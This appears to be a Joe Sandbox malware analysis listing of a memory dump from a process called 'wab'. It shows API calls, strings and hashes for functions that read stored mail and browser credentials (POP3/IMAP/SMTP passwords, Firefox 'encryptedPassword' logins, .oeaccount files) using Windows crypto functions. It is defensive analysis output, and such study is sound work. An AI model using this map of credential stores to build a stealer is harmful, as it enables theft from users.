                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 145871493-0
                                                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4165544737-0
                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863332320-0
                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                • API String ID: 2238633743-192783356
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00406E41
                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 00406E63
                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 2565263379-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                                                • _strncoll.MSVCRT ref: 004431BD
                                                                                                                • memcpy.MSVCRT ref: 00443239
                                                                                                                • atoi.MSVCRT ref: 0044324A
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                • API String ID: 1864335961-3210201812
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$strlen$_strncoll$atoimemcpy$memset
                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                • API String ID: 750245531-2206097438
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED59
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED6F
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED85
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED9B
                                                                                                                • _mbscpy.MSVCRT ref: 0040EDB1
                                                                                                                • _mbscpy.MSVCRT ref: 0040EDC7
                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                • API String ID: 3137614212-1455797042
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                • _mbscpy.MSVCRT ref: 0040E634
                                                                                                                • _mbscpy.MSVCRT ref: 0040E64A
                                                                                                                • _mbscpy.MSVCRT ref: 0040E660
                                                                                                                • _mbscpy.MSVCRT ref: 0040E676
                                                                                                                • _mbscpy.MSVCRT ref: 0040E68C
                                                                                                                • _mbscpy.MSVCRT ref: 0040E69F
                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                • _mbscpy.MSVCRT ref: 00402533
                                                                                                                • _mbscpy.MSVCRT ref: 004025FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                • API String ID: 168965057-606283353
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                • _mbscpy.MSVCRT ref: 004028A3
                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                • _mbscpy.MSVCRT ref: 0040297B
                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                • memcpy.MSVCRT ref: 0040FE82
                                                                                                                • _mbscpy.MSVCRT ref: 0040FEA4
                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
